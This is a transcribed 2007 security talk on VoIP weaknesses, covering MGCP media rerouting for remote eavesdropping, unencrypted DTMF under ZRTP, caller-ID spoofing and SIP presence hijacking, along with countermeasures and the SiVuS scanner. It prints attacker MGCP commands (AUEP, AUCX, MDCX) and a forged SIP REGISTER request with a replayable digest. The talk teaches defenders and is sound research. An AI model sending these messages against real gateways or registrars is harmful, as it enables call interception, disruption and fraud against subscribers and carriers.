Transparent weaknesses in VoIP

Similar documents
Vulnerabilities in SOHO VoIP Gateways

Security behind the dial tone. VoIP Security Threats, Vulnerabilities, Countermeasures, and Best Practices

NTP VoIP Platform: A SIP VoIP Platform and Its Services

How to make free phone calls and influence people by the grugq

Application Notes for Configuring SIP Trunking between McLeodUSA SIP Trunking Solution and an Avaya IP Office Telephony Solution 1.

VoIP some threats, security attacks and security mechanisms. Lars Strand RiskNet Open Workshop Oslo, 24. June 2009

Media Gateway Controller RTP

How To Understand The Purpose Of A Sip Aware Firewall/Alg (Sip) With An Alg (Sip) And An Algen (S Ip) (Alg) (Siph) (Network) (Ip) (Lib

Ingate Firewall/SIParator SIP Security for the Enterprise

SIP Essentials Training

Three-Way Calling using the Conferencing-URI

An outline of the security threats that face SIP based VoIP and other real-time applications

Cisco VoIP (in)security

Formación en Tecnologías Avanzadas

Session Initiation Protocol (SIP) 陳 懷 恩 博 士 助 理 教 授 兼 計 算 機 中 心 資 訊 網 路 組 組 長 國 立 宜 蘭 大 學 資 工 系 TEL: # 340

Voice over IP Security

Multimedia & Protocols in the Internet - Introduction to SIP

VoIP Signaling and Call Control

Voice over IP (SIP) Milan Milinković

Part II. Prof. Ai-Chun Pang Graduate Institute of Networking and Multimedia, Dept. of Comp. Sci. and Info. Engr., National Taiwan University

Application Notes for IDT Net2Phone SIP Trunking Service with Avaya IP Office Issue 1.0

IP-Telephony SIP & MEGACO

802.11: Mobility Within Same Subnet

Voice Over Internet Protocol (VOIP) SECURITY. Rick Kuhn Computer Security Division National Institute of Standards and Technology

SIP Basics. CSG VoIP Workshop. Dennis Baron January 5, Dennis Baron, January 5, 2005 Page 1. np119

ARCHITECTURES TO SUPPORT PSTN SIP VOIP INTERCONNECTION

Mobicents 2.0 The Open Source Communication Platform. DERUELLE Jean JBoss, by Red Hat 138

3GPP TS V8.1.0 ( )

SIP: Session Initiation Protocol. Copyright by Elliot Eichen. All rights reserved.

Recommended IP Telephony Architecture

Protect Yourself Against VoIP Hacking. Mark D. Collier Chief Technology Officer SecureLogix Corporation

TECHNICAL SUPPORT NOTE. 3-Way Call Conferencing with Broadsoft - TA900 Series

SIP: Protocol Overview

Anat Bremler-Barr Ronit Halachmi-Bekel Jussi Kangasharju Interdisciplinary center Herzliya Darmstadt University of Technology

IP Office Technical Tip

VoIP Fraud Analysis. Simwood esms Limited Tel:

Adaptation of TURN protocol to SIP protocol

SIP and VoIP 1 / 44. SIP and VoIP

NTP VoIP Platform: A SIP VoIP Platform and Its Services 1

Voice over IP & Other Multimedia Protocols. SIP: Session Initiation Protocol. IETF service vision. Advanced Networking

This specification this document to get an official version of this User Network Interface Specification

The VoIP Vulnerability Scanner

Hacking Trust Relationships of SIP Gateways

CPNI VIEWPOINT 03/2007 HOSTED VOICE OVER IP

Securing VoIP Networks using graded Protection Levels

Request for Comments: August 2006

EE4607 Session Initiation Protocol

Man-in-the-Middle Attack on T-Mobile Wi-Fi Calling

Session Initiation Protocol (SIP)

VoIP Security Methodology and Results. NGS Software Ltd

Secured Communications using Linphone & Flexisip

Connecting MPLS Voice VPNs Enabling the Secure Interconnection of Inter-Enterprise VoIP

Securing SIP Trunks APPLICATION NOTE.

A Brief Overview of VoIP Security. By John McCarron. Voice of Internet Protocol is the next generation telecommunications method.

VOICE OVER IP SECURITY

Multimedia Communication in the Internet. SIP: Advanced Topics. Dorgham Sisalem, Sven Ehlert Mobile Integrated Services FhG FOKUS

OSSIR, November /45

A Call Conference Room Interception Attack and its Detection

How To Understand How Open Source And Free Software Work Together

Need for Signaling and Call Control

VoIP. What s Voice over IP?

Application Notes for Configuring SIP Trunking between Metaswitch MetaSphere CFS and Avaya IP Office Issue 1.0

SIP Trunking & Peering Operation Guide

VoIP Security. Piero Fontanini

Basic Vulnerability Issues for SIP Security

ETSI TS V8.2.0 ( ) Technical Specification

Voice Over IP (VoIP) Denial of Service (DoS)

Firewall Support for SIP

SIP ALG - Session Initiated Protocol Applications- Level Gateway

Avaya IP Office 4.0 Customer Configuration Guide SIP Trunking Configuration For Use with Cbeyond s BeyondVoice with SIPconnect Service

Application Notes for Avaya IP Office 7.0 Integration with Skype Connect R2.0 Issue 1.0

Contents Introduction Why Fax over IP? How Real-time Fax over IP works Implementation with MessagePlus/Open Summary. About this document

IP Office 4.2 SIP Trunking Configuration Guide AT&T Flexible Reach and AT&T Flexible Reach with Business in a Box (SM)

Voice over IP Fundamentals

hackers 2 hackers conference III voip (in)security luiz eduardo cissp, ceh, cwne, gcih

AGILE SIP TRUNK IP-PBX Connection Manual (Asterisk)

For internal circulation of BSNL only

End-2-End QoS Provisioning in UMTS networks

Voice over IP Security

Denial of Services on SIP VoIP infrastructures

COPYRIGHTED MATERIAL. Contents. Foreword. Acknowledgments

Threats to be considered (1) ERSTE GROUP

IxLoad VoIP SIP, MGCP Features

White Paper A SECURITY GUIDE TO PROTECTING IP PHONE SYSTEMS AGAINST ATTACK. A balancing act

Session Border Controller and IP Multimedia Standards. Mika Lehtinen

VOIP SECURITY: BEST PRACTICES TO SAFEGUARD YOUR NETWORK ======

TSIN02 - Internetworking

BROADWORKS SIP ACCESS SIDE EXTENSIONS INTERFACE SPECIFICATIONS RELEASE Version 1

Multi-layered Security Solutions for VoIP Protection

Transcription:

Transparent weaknesses in VoIP Peter Thermos peter.thermos@palindrometech.com 2007 Palindrome Technologies, All Rights Reserved 1 of 56

Speaker Background Consulting Government and commercial organizations, consulting on information security and assurance, InfoSec program development and management, vulnerability assessments, security architecture, NGN/VoIP/IMS. Research Principal investigator on research tasks, in the area of Internet Multimedia and Next Generation Networks (VoIP) and security, that were are funded by government organizations such as NIST (National Institute of Standards and Technology), DARPA (Defense Advanced Research Agency), NSF (National Science Foundation) and others. In addition he has been working with domestic and foreign Telecommunications carriers and Fortune 500 companies on identifying security requirements for IMS/NGN and VoIP, conducting vulnerability assessments and product evaluations. Member of IETF/IEEE/ACM. Education MS,CS Columbia University 2007 Palindrome Technologies, All Rights Reserved 2 of 56

Outline Quick intro Then and now Attacks Transparent weaknesses MGCP ZRTP Other attacks Presence hijacking Caller-ID spoofing How do we secure NGN /VoIP networks and conclusions SiVuS 1.10 Additional references 2007 Palindrome Technologies, All Rights Reserved 3 of 56

Present and Future (Summary) PSTN Network Closed therefore secure High availability (99.999%) Limited connection to IP (OSS provisioning, management) IP Network Loose access controls. Best effort Connected to accessible IP networks. There There is is one one safeguard safeguard known known generally generally to to the the wise, wise, which which is is an an advantage advantage and and security security to to all, all, but but especially especially to to democracies democracies as as against against despots. despots. What What is is it? it? Distrust. Distrust... Demosthenes Demosthenes (c. (c. 384 322 384 322 B.C.), B.C.), Greek Greek orator. orator. Second Second Philippic, Philippic, sct. sct. 24 24 (344 (344 B.C.) B.C.) 2007 Palindrome Technologies, All Rights Reserved 4 of 56

Now - The Converged Network 2007 Palindrome Technologies, All Rights Reserved 5 of 56

Components and Signaling Protocols 2007 Palindrome Technologies, All Rights Reserved 6 of 56

Outline Quick intro Then and now Attacks Transparent weaknesses MGCP ZRTP Other attacks Presence hijacking Caller-ID spoofing How do we secure NGN /VoIP networks and conclusions SiVuS 1.10 Additional references 2007 Palindrome Technologies, All Rights Reserved 7 of 56

Attacks Attacks Service disruption (amplification attacks DoS/DDoS) Eavesdropping (including traffic analysis) Fraud (including service and intellectual assets, confidential information) Unauthorized access (compromise systems with intentions to attack other systems or exploit vulnerabilities to commit fraud and eavesdropping). Annoyance (e.g. SPIT) Target(s) Network Owners, Service Providers, Subscribers Network Owners, Service Providers, Subscribers Network Owners, Service Providers Network Owners, Service Providers, Subscribers Subscribers 2007 Palindrome Technologies, All Rights Reserved 8 of 56

Where are the vulnerabilities? Threat model, vulnerabilities originate from the difficulty to foresee future threats (e.g. Signaling System No.7) Design & specification vulnerabilities come from errors or oversights in the design of the protocol that make it inherently vulnerable (e.g., SIP, MCGP, 802.11b) Implementation vulnerabilities are vulnerabilities that are introduced by errors in a protocol implementation Architecture, network topology and association (e.g. routing) with other network elements. 2007 Palindrome Technologies, All Rights Reserved 9 of 56

Attack Categories Attack Categories Service disruption (DoS/DDoS) Against phones, proxies, routers SIP/MGCP/H.323/RTP Affects edge-devices, overloads signaling elements and consumes network bandwidth Unauthorized access Network elements including subscriber devices, voice mail, email, DNS, NTP, DHCP servers. Service Applications Management systems Provisioning Systems Billing Systems Eavesdropping and traffic analysis Fraud Network element compromise Manipulating the signaling messages and/or call flow 2007 Palindrome Technologies, All Rights Reserved 10 of 56

We will focus on.. MGCP manipulation Remote eavesdropping Call diversion Call disruption ZRTP weaknesses But we will also discuss Presence hijacking Caller-ID spoofing 2007 Palindrome Technologies, All Rights Reserved 11 of 56

MGCP Media Gateway Control Protocol IETF RFC 2705 Ports 2427 call agent to gateway 2727 gateway to call agent 2007 Palindrome Technologies, All Rights Reserved 12 of 56

MGCP message structure 2007 Palindrome Technologies, All Rights Reserved 13 of 56

MGCP at the gateway 2007 Palindrome Technologies, All Rights Reserved 14 of 56

Remote eavesdropping through media rerouting 2007 Palindrome Technologies, All Rights Reserved 15 of 56

The steps 1. Identify gateway channels 2. Interrogating a channel 3. Audit a specific connection 4. Reroute 2007 Palindrome Technologies, All Rights Reserved 16 of 56

Identify gateway channels Attacker request AUEP 1500 *@mgcp.gateway MGCP 0.1 Gateway response 200 1500 Z: S0/SU1/DS1-0/1@mgcp.gateway Z: S0/SU1/DS1-0/2@mgcp.gateway Z: S0/SU1/DS1-0/3@mgcp.gateway Z: S0/SU1/DS1-0/4@mgcp.gateway 2007 Palindrome Technologies, All Rights Reserved 17 of 56

Interrogating a channel Attacker request AUEP 1000 S0/SU1/DS1-0/1@mgcp.gateway MGCP 0.1 F: R,D,S,X,N,I,T,O,ES Gateway response 200 1000 I: 2EDA N: ca@10.96.1.51:2427 X: 1 R: D/[0-9ABCD*#](N) S: O: T: ES: Important info to note (connection ID) Important info to note (associated call manager) 2007 Palindrome Technologies, All Rights Reserved 18 of 56

Audit a specific connection Attacker request AUCX 1 S0/SU1/DS1-0/1@mgcp.gateway MGCP 1.0 I: 2EDA F: C,N,L,M,LC,RC,P Gateway response 200 1 C: D000000002000594000000F50000001d N: ca@10.6.1.21:2427 L: p:20, a:pcmu, s:off, t:b8 M: sendrecv P: PS=9817, OS=1570720, PR=9817, OR=1570720, PL=0, JI=60, LA=0 v=0 c=in IP4 10.6.255.25 m=audio 18688 RTP/AVP 0 100 a=rtpmap:100 X-NSE/8000 a=fmtp:100 192-194 2007 Palindrome Technologies, All Rights Reserved 19 of 56

This might work Attacker request MDCX 1553 S0/SU1/DS1-0/1@mgcp.gateway MGCP 0.1 C: D000000002003e0e000000F580001f6d I: 2EDA X: 16 L: p:20, a:pcmu, s:off, t:b8 M: sendrecv R: D/[0-9ABCD*#] Q: process, loop v=0 o=- 1334 0 IN EPN S0/SU1/DS1-0/1@mgcp.gateway s=disco SDP 0 t=0 0 m=audio 17994 RTP/AVP 0 c=in IP4 10.6.158.178 2007 Palindrome Technologies, All Rights Reserved 20 of 56

Ergo 2007 Palindrome Technologies, All Rights Reserved 21 of 56

Consequences Ability to: eavesdrop in to conference calls man in the middle by impersonating as a call manager (EPCF, end-point configuration) Call disruption (DLCX, delete a connection) Originate a calls 2007 Palindrome Technologies, All Rights Reserved 22 of 56

Protection Does defense in depth tells you anything? Buller? Network ACL s to prevent access to MGCP ports (2427) from un-trusted hosts. Establish a trust relationship between CA and gateway IPSec 2007 Palindrome Technologies, All Rights Reserved 23 of 56

Zfone protects voice except 2007 Palindrome Technologies, All Rights Reserved 24 of 56

Zfone Implementation of ZRTP ZRTP key exchange through the media path (RTP) 2007 Palindrome Technologies, All Rights Reserved 25 of 56

ZRTP key exchange 2007 Palindrome Technologies, All Rights Reserved 26 of 56

Analysis of ZRTP traffic 2007 Palindrome Technologies, All Rights Reserved 27 of 56

DTMF tones are not encrypted 2007 Palindrome Technologies, All Rights Reserved 28 of 56

Examples of DTMF use IVR Interactive Voice Response system (navigation and authentication) Credit card verification Bank account management Customer support call center 2007 Palindrome Technologies, All Rights Reserved 29 of 56

Protection approach Extend ZRTP/Zfone implementation to protect DTMF Send DTMF through protected signaling 2007 Palindrome Technologies, All Rights Reserved 30 of 56

Attacks - Spoofing Caller-ID 2007 Palindrome Technologies, All Rights Reserved 31 of 56

Companies that offer Caller-ID Spoofing https://connect.voicepulse.com/ http://www.nufone.net/ http://www.spooftel.net/ 2007 Palindrome Technologies, All Rights Reserved 32 of 56

Spoofing Caller-ID using SiVuS Manipulate the FROM header information Send and INVITE to a phone 2007 Palindrome Technologies, All Rights Reserved 33 of 56

Attacks - Presence Hijacking Presence Hijacking/Masquerading Attack using SIP 2007 Palindrome Technologies, All Rights Reserved 34 of 56

Presence Hijacking using SiVuS The objective is to spoof a REGISTER request The REGISTER request contains the Contact: header which indicates the IP address of the SIP device. 2007 Palindrome Technologies, All Rights Reserved 35 of 56

Presence Hijacking using SiVuS Regular Register Request 2007 Palindrome Technologies, All Rights Reserved 36 of 56

The Attack 2007 Palindrome Technologies, All Rights Reserved 37 of 56

Manipulated REGISTER request properties IP address of the VoIP device on which a POTS phone is attached REGISTER sip:216.1.2.5 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.6;branch=xajB6FLTEHIcd0 From: 732-835-0102 <sip:12125550102@voip-serviceprovider.net:5061>;tag=5e374a8bad1f7c5x1 To: 732-835-0102 <sip:12125550102@voip-service-provider.net:5061> Call-ID: QTEv5G5dOHYc@192.168.1.2 CSeq: 123456 REGISTER Contact: 2125550102 <sip:12125550102@192.168.1.3:5061>; Digest username="12125550102",realm="216.1.2.5",nonce="716917624", uri="sip:voip-service-provider.net:5061",algorithm=md5, response="43e001d2ef807f1e2c96e78adfd50bf7" Max_forwards: 70 User Agent: 001217E57E31 VoIP-Router/RT31P2-2.0.13(LIVd) Content-Type: application/sdp Subject: SiVuS Test Expires: 7200 Content-Length: 0 IP address that calls will be routed to (attacker) Authentication MD5 digest can be intercepted and used to replay messages 2007 Palindrome Technologies, All Rights Reserved 38 of 56

Presence Hijacking using SiVuS The REGISTER Message 2007 Palindrome Technologies, All Rights Reserved 39 of 56

Outline Quick intro Then and now Attacks Transparent weaknesses MGCP ZRTP Other attacks Presence hijacking Caller-ID spoofing How do we secure NGN /VoIP networks and conclusions SiVuS 1.10 Additional references 2007 Palindrome Technologies, All Rights Reserved 40 of 56

How do we secure NGN/VoIP networks? Assess and Verify Assess and Verify From the ground up From the ground up SECURITY is is NOT NOT a product, it s it s a PROCESS!! 2007 Palindrome Technologies, All Rights Reserved 41 of 56 Page 41

Outline Quick intro Then and now Attacks Transparent weaknesses MGCP ZRTP Other attacks Presence hijacking Caller-ID spoofing How do we secure NGN /VoIP networks and conclusions SiVuS 1.10 Additional references 2007 Palindrome Technologies, All Rights Reserved 42 of 56

Vulnerability Assessment SiVuS 2007 Palindrome Technologies, All Rights Reserved 43 of 56

SiVuS Message Generator 2007 Palindrome Technologies, All Rights Reserved 44 of 56

SiVuS - Discovery 2007 Palindrome Technologies, All Rights Reserved 45 of 56

SiVuS configuration 2007 Palindrome Technologies, All Rights Reserved 46 of 56

SiVuS Control Panel 2007 Palindrome Technologies, All Rights Reserved 47 of 56

SiVuS Reporting 2007 Palindrome Technologies, All Rights Reserved 48 of 56

SiVuS Authentication Analysis 2007 Palindrome Technologies, All Rights Reserved 49 of 56

Outline Quick intro Then and now Attacks Transparent weaknesses MGCP ZRTP Other attacks Presence hijacking Caller-ID spoofing How do we secure NGN /VoIP networks and conclusions SiVuS 1.10 Additional references 2007 Palindrome Technologies, All Rights Reserved 50 of 56

Additional references 2007 Palindrome Technologies, All Rights Reserved 51 of 56

References VoIPSA VoIP Security Alliance, www.voipsa.org The VoP Security Forum, www.vopsecurity.org NIST Security Considerations for VoIP Systems Voice over Internet Protocol (VoIP), Security Technical Implementation Guide (DISA) http://www.ietf.org/html.charters/iptel-charter.html IP Telephony Tutorial, http://www.pt.com/tutorials/iptelephony/ Signaling System 7 (SS7), http://www.iec.org/online/tutorials/ss7/topic14.html SIP - http://www.cs.columbia.edu/sip/ IP Telephonly with SIP - www.iptel.org/sip/ SIP Tutorials The Session Initiation Protocol (SIP) http://www.cs.columbia.edu/~hgs/teaching/ais/slides/sip_long.pdf SIP and the new network communications model http://www.webtorials.com/main/resource/papers/nortel/paper19.htm H.323 ITU Standards, http://www.imtc.org/h323.htm Third Generation Partnership Project (3gpp), http://www.3gpp.org/ 2007 Palindrome Technologies, All Rights Reserved 52 of 56

Standards ITU Focus Group on Next Generation Networks (FGNGN ) - http://www.itu.int/itu-t/ngn/fgngn/ Open Communications Architecture Forum (OCAF) Focus Group http://www.itu.int/itu-t/ocaf/index.html IETF Transport area - http://www.ietf.org/html.charters/wgdir.html#transport%20area Security Area - http://www.ietf.org/html.charters/wgdir.html#security%20area ATIS - http://www.atis.org/0191/index.asp T1S1.1--Lawfully Authorized Electronic Surveillance T1S1.2--Security Lawful Intercept 3GPP - TS 33.106 and TS 33.107 ETSI DTS 102 v4.0.4 2007 Palindrome Technologies, All Rights Reserved 53 of 56

VoP Security Forum The objectives of the VoPSecurity.org forum: Encourage education in NGN/VoIP security through publications, online forums and mailing lists (voptalk@vopsecurity.org and members@vopsecurity.org) Develop capabilities (tools, interoperability testing, methodologies and best practices) for members to maintain security in their respective infrastructure. Conduct research to help identify vulnerabilities and solutions associated with NGN/VoIP. Coordinate annual member meetings to disseminate information, provide updates and promote interaction and initiatives regarding NGN/VoIP security. The VoP Security forum is viewed as a mechanism for participating members to be proactive and stay current with the threats and vulnerabilities associated with NGN/VoIP security and extend research in this area. 2007 Palindrome Technologies, All Rights Reserved 54 of 56

VoPSecurity Forum Current Activities Mailing lists Public (voptalk@vopsecurity.org) Documentation Intro to NGN Security (available) Join the community! Vulnerability Analysis Methodology for VoIP networks (in development) VoIP Firewalls (in development) Tools SiVuS VoIP vulnerability Scanner (available) Research Security evaluation of residential VoIP gateways 2007 Palindrome Technologies, All Rights Reserved 55 of 56

Q & A Contact info: Peter Thermos pthermos@vopsecurity.org peter@palindrometech.com 2007 Palindrome Technologies, All Rights Reserved 56 of 56

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information